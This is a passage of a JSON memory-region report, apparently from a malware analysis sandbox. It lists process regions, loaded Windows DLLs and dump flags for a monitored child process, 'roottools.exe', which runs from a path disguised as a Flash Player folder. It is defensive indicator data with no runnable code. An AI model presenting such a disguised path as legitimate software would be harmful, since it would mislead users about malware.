null, "size": 4096, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3870719, "entry_point": 0, "filename": null, "id": "region_3758", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:05:28.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 196608, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_3759", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:05:28.117", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", "filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "id": "proc_22", "image_name": "roottools.exe", "monitor_reason": "child_process", "monitored_id": 22, "origin_monitor_id": 20, "ref_parent_process": { "ref_id": "proc_20", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3760", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3761", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3762", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_3763", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_3764", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_3765", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4403199, "entry_point": 4194304, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "id": "region_3766", "name": "roottools.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3767", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3768", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3769", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3770", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3771", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3772", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:05:28.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3773", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:05:28.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3774", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:05:28.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3775", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:05:28.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_3776", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:05:28.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3777", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:05:28.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3778", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:05:28.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3779", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:05:28.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3780", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3781", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6422527, "entry_point": 0, "filename": null, "id": "region_3782", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7798784, "type": "region", "version": 1 }, "end_va": 7864319, "entry_point": 0, "filename": null, "id": "region_3783", "name": "private_0x0000000000770000", "norm_filename": null, "region_type": "private_memory", "start_va": 7798784, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1388544, "start_va": 1922301952, "type": "region", "version": 1 }, "end_va": 1923690495, "entry_point": 1922301952, "filename": "\\Windows\\SysWOW64\\msvbvm60.dll", "id": "region_3784", "name": "msvbvm60.dll", "norm_filename": "c:\\windows\\syswow64\\msvbvm60.dll", "region_type": "memory_mapped_file", "start_va": 1922301952, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3785", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3786", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3787", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3788", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1974337536, "type": "region", "version": 1 }, "end_va": 1975762943, "entry_point": 1974337536, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3789", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1974337536, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3790", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3791", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:05:28.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1981480960, "type": "region", "version": 1 }, "end_va": 1982066687, "entry_point": 1981480960, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3792", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1981480960, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3793", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3794", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3795", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3796", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3797", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3798", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_3799", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_3800", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3801", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3802", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:05:28.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 9469951, "entry_point": 0, "filename": null, "id": "region_3803", "name": "pagefile_0x0000000000780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7864320, "timestamp": "00:05:28.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3804", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:05:28.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3805", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:05:28.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_3806", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:05:28.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_3807", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:05:28.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 11079679, "entry_point": 0, "filename": null, "id": "region_3808", "name": "pagefile_0x0000000000910000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9502720, "timestamp": "00:05:28.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11141120, "type": "region", "version": 1 }, "end_va": 32112639, "entry_point": 0, "filename": null, "id": "region_3809", "name": "pagefile_0x0000000000aa0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11141120, "timestamp": "00:05:28.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 327680, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_3810", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:05:28.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 36306943, "entry_point": 0, "filename": null, "id": "region_3811", "name": "private_0x0000000001ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32112640, "timestamp": "00:05:28.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 39251967, "entry_point": 36306944, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3812", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36306944, "timestamp": "00:05:28.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2228224, "start_va": 39256064, "type": "region", "version": 1 }, "end_va": 41484287, "entry_point": 0, "filename": null, "id": "region_3813", "name": "private_0x0000000002570000", "norm_filename": null, "region_type": "private_memory", "start_va": 39256064, "timestamp": "00:05:28.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 720896, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_3814", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:05:28.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1947926528, "type": "region", "version": 1 }, "end_va": 1948450815, "entry_point": 1947926528, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_3815", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1947926528, "timestamp": "00:05:28.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 720896, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_3816", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:05:28.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 7335935, "entry_point": 0, "filename": null, "id": "region_3817", "name": "pagefile_0x0000000000620000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6422528, "timestamp": "00:05:28.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], 